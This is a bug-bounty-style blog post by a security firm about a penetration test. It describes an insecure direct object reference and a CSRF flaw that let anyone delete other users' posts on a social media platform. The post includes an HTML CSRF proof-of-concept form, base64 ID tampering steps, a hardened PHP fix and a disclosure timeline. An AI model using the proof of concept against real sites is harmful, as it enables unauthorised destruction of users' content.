How I was able to delete anyone’s post

Rapid SafeGuard
Nov 5

Hello Guys,
This is Rapid Safeguard. Rapid Safeguard is a foolproof security solution for the emerging businesses and startups of India. We focus on four major verticals: Web Security, Network Security, IoT Security and Mobile Security. We have developed a web application vulnerability scanning software.

Last month I was doing penetration testing for a private company with our proprietary software. The company runs a social media platform. Our software discovered an information disclosure vulnerability.

[Scanner findings: server disclosure, information disclosure, exposed phpinfo page]

As per our company rule, we focus more on manual testing. So I dug into the application, and some parameter manipulation combined with a CSRF attack made it possible to delete anyone's post. Let's see how.

I went through the delete-post function looking for a vulnerability. It looked like a simple delete function with a JavaScript confirm box; the post ID is base64-encoded. I tried manipulating the delete parameter to point at someone else's post.

[Screenshot: the delete-post request]

I changed the delete parameter value, which is just "base64encode(value)", for example "MzUx" = 351. I got a "200 OK" response. Now I was able to delete any post without any admin or user permission.

CSRF proof of concept

<html>
<body>
<!-- hide the attacker page's real path from the address bar -->
<script>history.pushState('', '', '/')</script>
<!-- plain GET form: the endpoint accepts the request with no CSRF token -->
<form action="https://Target/post_data.php">
<!-- del = base64-encoded post ID, e.g. "MzUx" for post 351 -->
<input type="hidden" name="del" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Surprise!! There is no CSRF token. Put the base64-encoded post ID in the del value.
Post inspired by a blog by Avinash Jain (@logicbomb_1).
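The fix this report points to, as an added example that is not the tested application's code: the handler verifies a per-session CSRF token, decodes the base64 ID strictly, and scopes the DELETE to the logged-in user so a foreign ID matches nothing. `$pdo`, the `posts(id, user_id)` table and the `$_SESSION` keys are assumptions.

```php
<?php
// Added example, not the tested application's code. Hardened delete-post
// handler: (1) POST only, (2) per-session CSRF token, (3) strict decoding of
// the base64 post id, (4) the DELETE is scoped to the logged-in user.
// Assumptions: $pdo is a connected PDO instance, table posts(id, user_id),
// and login stores the user id in $_SESSION['user_id'].
session_start();

// A state-changing action must not run on a plain GET link.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    exit;
}

// 1. Anti-CSRF token. The page that renders the delete button emits it as a
//    hidden input named csrf_token; its value is $_SESSION['csrf_token'],
//    generated once at login with bin2hex(random_bytes(32)).
$token = $_POST['csrf_token'] ?? '';
if (!isset($_SESSION['csrf_token']) || !hash_equals($_SESSION['csrf_token'], $token)) {
    http_response_code(403);
    exit('Invalid CSRF token');
}

// 2. The caller must be logged in; the session, not the request, identifies them.
$userId = $_SESSION['user_id'] ?? null;
if ($userId === null) {
    http_response_code(401);
    exit;
}

// 3. Decode the id strictly: "MzUx" -> "351". Reject non-base64 input and
//    anything that is not a plain positive integer.
$raw = base64_decode($_POST['del'] ?? '', true);
if ($raw === false || !ctype_digit($raw)) {
    http_response_code(400);
    exit('Bad post id');
}
$postId = (int) $raw;

// 4. Authorization lives in the query itself: a post owned by someone else
//    matches zero rows, so guessing ids cannot delete it.
$stmt = $pdo->prepare('DELETE FROM posts WHERE id = :id AND user_id = :uid');
$stmt->execute([':id' => $postId, ':uid' => $userId]);
if ($stmt->rowCount() === 0) {
    // Not the owner (or no such post): report it rather than returning 200 OK.
    http_response_code(403);
    exit('Not your post');
}
echo 'Deleted';
```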

Rapid Safeguard

Report details

26 Sep 2019: Bug reported to the concerned company

20 Oct 2019: Bug fixed
